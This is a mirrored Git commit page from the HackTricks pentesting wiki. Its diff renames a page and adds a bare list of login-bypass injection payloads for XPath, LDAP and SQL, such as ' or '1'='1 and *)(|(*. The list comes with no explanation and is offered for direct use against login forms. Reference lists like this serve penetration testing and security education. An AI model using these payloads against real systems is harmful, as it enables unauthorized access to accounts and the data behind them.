Mirrors/hacktricks
2
0
Fork 0
mirror of https://github.com/carlospolop/hacktricks synced 2025-02-16 14:08:26 +00:00
Code Issues Projects Releases Packages Wiki Activity

GitBook: [master] 2 pages modified

Browse source
This commit is contained in:
CPol 2021-06-26 16:04:21 +00:00 committed by gitbook-bot
parent 46617092f7
commit 0e935b8787
No known key found for this signature in database
GPG key ID: 07D2180C7B12D0FF
2 changed files with 28 additions and 2 deletions
Show stats Download patch file Download diff file Expand all files Collapse all files

2
SUMMARY.md
View file

@ -377,7 +377,7 @@
* [NoSQL injection](pentesting-web/nosql-injection.md)
* [LDAP Injection](pentesting-web/ldap-injection.md)
* [Login Bypass](pentesting-web/login-bypass/README.md)
* [SQL Login bypass](pentesting-web/login-bypass/sql-login-bypass.md)
* [Login bypass List](pentesting-web/login-bypass/sql-login-bypass.md)
* [OAuth to Account takeover](pentesting-web/oauth-to-account-takeover.md)
* [Open Redirect](pentesting-web/open-redirect.md)
* [Parameter Pollution](pentesting-web/parameter-pollution.md)

28
pentesting-web/login-bypass/sql-login-bypass.md
View file

@ -1,6 +1,32 @@
# SQL Login bypass
# Login bypass List
This list contains **payloads to bypass the login via XPath, LDAP and SQL injection**\(in that order\).
```text
' or '1'='1
' or ''='
' or 1]%00
' or /* or '
' or "a" or '
' or 1 or '
' or true() or '
'or string-length(name(.))<10 or'
'or contains(name,'adm') or'
'or contains(.,'adm') or'
'or position()=2 or'
admin' or '
admin' or '1'='2
*
*)(&
*)(|(&
pwd)
*)(|(*
*))%00
admin)(&)
pwd
admin)(!(&(|
pwd))
admin))(|(|
1234
'-'
' '